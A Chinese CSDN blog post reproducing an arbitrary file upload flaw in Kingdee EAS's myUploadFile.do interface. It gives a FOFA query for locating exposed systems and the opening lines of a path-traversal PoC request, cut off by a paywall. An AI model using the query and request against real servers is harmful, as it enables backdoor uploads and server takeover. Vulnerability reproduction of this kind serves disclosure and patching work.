金碟EAS myUploadFile.do接口处任意文件上传

最新推荐文章于 2024-04-03 15:15:00 发布
最新推荐文章于 2024-04-03 15:15:00 发布
阅读量121 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136449491
版权
金蝶EAS的myUploadFile.do接口存在任意文件上传漏洞,允许攻击者上传恶意后门文件,可能威胁服务器安全。通过fofa查询工具可以定位到该问题。复现过程中,特定请求包的返回内容可确认漏洞存在。解决方案是及时进行版本升级。
摘要由CSDN通过智能技术生成

0x01 产品介绍

金蝶EAS帮助企业构筑业财资税票档一体化平台,提升企业在市场竞争中的数字战斗力,其中myUploadFile.do存在任意文件上传。

0x02 漏洞概述

金碟EAS myUploadFile.do接口处存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限。

搜索语法
fofa语法查找:app=”Kingdee-EAS”

0x03 漏洞复现

页面

image.png

poc:

POST /easportal/buffalo/%2e%2e/cm/myUploadFile.do HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Length: 198
Accept: */*
Accept-Encoding: gzip, deflate
Con
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
订阅专栏
某蝶EAS(Enterprise Application Suite)平台myUploadFile接口任意文件上传漏洞复现 CNVD-2023-57598
afei001
10-17 599
某蝶EAS(Enterprise Application Suite)是金某集团开发的一套企业级应用软件解决方案。它是一款集成化的企业管理软件,旨在帮助企业实现业务流程的数字化、自动化和优化。金蝶EAS提供了多个功能模块,涵盖了企业的各个方面,包括财务管理、人力资源管理、供应链管理、生产制造管理、销售与客户关系管理、项目管理等。这些模块可以根据企业的需求进行灵活的配置和定制,以满足不同行业和规模企业的管理需求。 某蝶EAS平台myUploadFile接口存在任意文件上传漏洞,攻击者可利用该
LiveBOS UploadFile.do 任意文件上传漏洞复现(XVE-2023-21708)
最新发布
0xSec
08-01 930
LiveBOS UploadFile.do 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
jsp实现文件上传——douploadFile.jsp
穆雄雄的博客
11-21 295
<%@page import="java.io.File"%> <%@page import="org.apache.commons.fileupload.FileItem"%> <%@page import="org.apache.commons.fileupload.disk.DiskFileItemFactory"%> <%@page impor
【漏洞复现】金蝶EASEAS Cloud远程代码执行漏洞
2301_80127209的博客
04-03 674
金蝶 EASEAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。金蝶 EASEAS Cloud 存在远程代码执行漏洞。
金蝶EASEAS Cloud远程代码执行漏洞
hackzkaq的博客
10-13 811
金蝶 EASEAS Cloud 存在远程代码执行漏洞。
金蝶 EASEAS Cloud任意文件上传漏洞复现
0xSec
11-20 1179
金蝶 EASEAS Cloud 在 uploadLogo.action 接口处存在文件上传漏洞,攻击者可以利用文件上传漏洞执行恶意代码、写入后门、从而可能导致服务器受到攻击并被控制。
金蝶EAS DEP脚本汇总.docx
12-17
金蝶EAS DEP脚本汇总 在金蝶EAS系统中,DEP脚本是一种基于JavaScript语法的脚本语言,用于扩展系统的功能。下面是DEP脚本的详细知识点: 一、基本概念 DEP脚本是一种基于JavaScript语法的脚本语言,用于扩展金蝶...
金蝶 EAS 凭证引入 “webservice 接口”说明
08-15
下面是根据提供的文件内容总结的金蝶EAS凭证引入WebService接口的相关知识点: 1. EAS发布的WebService接口 EAS系统发布的WebService接口主要包括登录服务EASLogin和凭证引入服务importVoucher。使用这些接口前,...
【漏洞复现】金蝶EAS uploadlogo 存在任意文件上传漏洞
https://blog.echo234.cn/
03-28 643
金蝶EAS帮助企业构筑业财资税票档一体化平台,提升企业在市场竞争中的数字战斗力,金蝶EAS uploadlogo存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
Vue 文件上传 的属性解释
m0_53075883的博客
01-08 1422
代码 <el-button type="primary" @click="dialogFormVisible = true,form = {}">新增</el-button> <el-dialog title="新增" :visible.sync="dialogFormVisible"> <el-form ref="form" :model="form" label-width="80px"> <el-for...
Springmvc上传文件
我不想努力了
03-17 118
SpringMVC上传文件 &lt;!-- 页面文件上传三要素 --&gt; &lt;form action="/uploadFile.do" method="post" enctype="multipart/form-data"&gt; &lt;input type="file" name="file"&gt; &lt;/form&gt;
FileUpload 上传文件 详细参数设置 前后台代码
qq_39493425的博客
04-13 9188
html代码: &lt;div id="fileQueue"&gt;&lt;/div&gt; &lt;--进度展示--&gt; &lt;div id="uploadify" class="attch-img-btn"&gt; &lt;/div&gt;&lt;--上传按钮--&gt;
基于springMVC的文件上传
weixin_46007404的博客
08-13 238
基于springMVC的多文件上传和单文件上传 普通Java工程上传文件需要依赖这两个jar包: 本例所使用spring boot创建的web工程没有手动添加以上两个jar包的依赖,其他若需要则加上 accept="image/gif, image/jpeg, image/png":用于上传文件类型的限制 1.单文件上传 代码实现: 1.1:file.html: <!--单文件上传--> <form action="uploadF...
文件上传-FileUpload
Do_GH的博客
02-23 1796
文件上传即从本地磁盘文件中通过IO写入服务器的操作。一般存在一下几种方法完成,例如:Servlet3.0,JSPSmartUploadFileUpload,框架。本篇章主要介绍FileUpload文件上传的三要素 表单的提交方式必须为POST; 表单的文件上传表单项中必须有name属性,例如:<input type="file" name="upload"/> 表单的enctype属性的值必须是multipart/form-data enctype为表单提交时所采取的传输编码方式,默
FileUpload组件(文件上传下载)
QQ1012421396的博客
05-05 3609
文件上传web设置 实现web开发中的文件上传功能,操作步骤:         1.在web页面中添加上传输入项。         2.在servlet中读取上传文件的数据,并保存到本地硬盘中。 标签用于在web页面中添加文件上传输入项,设置文件上传输入项时须注意: 1.必须要设置input输入项的name属性,否则浏览器将不会发送上传文件的数据。
简单文件上传
进三步的博客
09-08 167
文件上传
金蝶EAS凭证引入WebService接口技术详解
外部系统基于此wsdl文件创建客户端,调用EAS的财务凭证接口。接口包括协议类(如localhost.bosws.services.WSWSVoucher)和JavaBean类(如wsvoucher.client),前者用于获取接口,后者提供必要的参数。 三、凭证...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值